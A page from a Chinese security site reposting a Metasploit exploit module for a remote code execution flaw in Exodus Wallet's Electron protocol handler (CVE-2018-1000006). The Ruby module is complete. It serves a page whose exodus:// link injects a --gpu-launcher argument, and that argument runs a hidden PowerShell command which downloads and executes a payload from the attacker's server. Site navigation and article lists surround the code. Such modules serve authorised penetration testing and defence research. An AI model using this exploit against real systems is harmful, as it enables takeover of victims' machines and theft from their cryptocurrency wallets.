首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Exodus Wallet (ElectronJS Framework) - Remote Code Execution (Metasploit)
来源:metasploit.com 作者:Teixeira 发布时间:2018-03-30  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core/exploit/powershell'
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking
 
  include Msf::Exploit::EXE
  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::HttpServer::HTML
 
  def initialize(info = {})
    super(update_info(info,
      'Name'         => 'Exodus Wallet (ElectronJS Framework) remote Code Execution',
      'Description'  => %q(
         This module exploits a Remote Code Execution vulnerability in Exodus Wallet,
         a vulnerability in the ElectronJS Framework protocol handler can be used to
         get arbitrary command execution if the user clicks on a specially crafted URL.
      ),
      'License'      => MSF_LICENSE,
      'Author'       =>
        [
          'Wflki',          # Original exploit author
          'Daniel Teixeira' # MSF module author
        ],
      'DefaultOptions' =>
        {
          'SRVPORT'    => '80',
          'URIPATH'    => '/',
        },
      'References'     =>
        [
          [ 'EDB', '43899' ],
          [ 'BID', '102796' ],
          [ 'CVE', '2018-1000006' ],
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['PSH (Binary)', {
            'Platform' => 'win',
            'Arch' => [ARCH_X86, ARCH_X64]
          }]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 25 2018'
    ))
 
  register_advanced_options(
    [
      OptBool.new('PSH-Proxy', [ true,  'PSH - Use the system proxy', true ]),
    ], self.class
  )
  end
 
  def gen_psh(url)
      ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
 
      download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
 
      download_and_run = "#{ignore_cert}#{download_string}"
 
      return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
  end
 
  def serve_payload(cli)
   data = cmd_psh_payload(payload.encoded,
      payload_instance.arch.first,
      remove_comspec: true,
      exec_in_place: true
    )
 
    print_status("Delivering Payload")
    send_response_html(cli, data, 'Content-Type' => 'application/octet-stream')
  end
 
  def serve_page(cli)
    psh = gen_psh("#{get_uri}payload")
    psh_escaped = psh.gsub("\\","\\\\\\\\").gsub("'","\\\\'")
    val = rand_text_alpha(5)
 
    html = %Q|<html>
<!doctype html>
<script>
  window.location = 'exodus://#{val}" --gpu-launcher="cmd.exe /k #{psh_escaped}" --#{val}='
</script>
</html>
|
    send_response_html(cli, html)
  end
 
  def on_request_uri(cli, request)
    case request.uri
    when /payload$/
      serve_payload(cli)
    else
      serve_page(cli)
    end
  end
 
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GitStack - Unsanitized Argumen
·Joomla Component Fields - SQLi
·Drupal 7.0 < 7.31 - 'Drupalged
·Tenda W308R V2 Wireless Router
·Allok AVI DivX MPEG To DVD Con
·ManageEngine Application Manag
·Square 9 GlobalForms 6.2.x Bli
·SysGauge 4.5.18 Denial Of Serv
·Homematic CCU2 2.29.23 - Arbit
·TwonkyMedia Server 7.0.11-8.5
·Allok Video Joiner 4.6.1217 -
·Tenda N11 Wireless Router 5.07
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved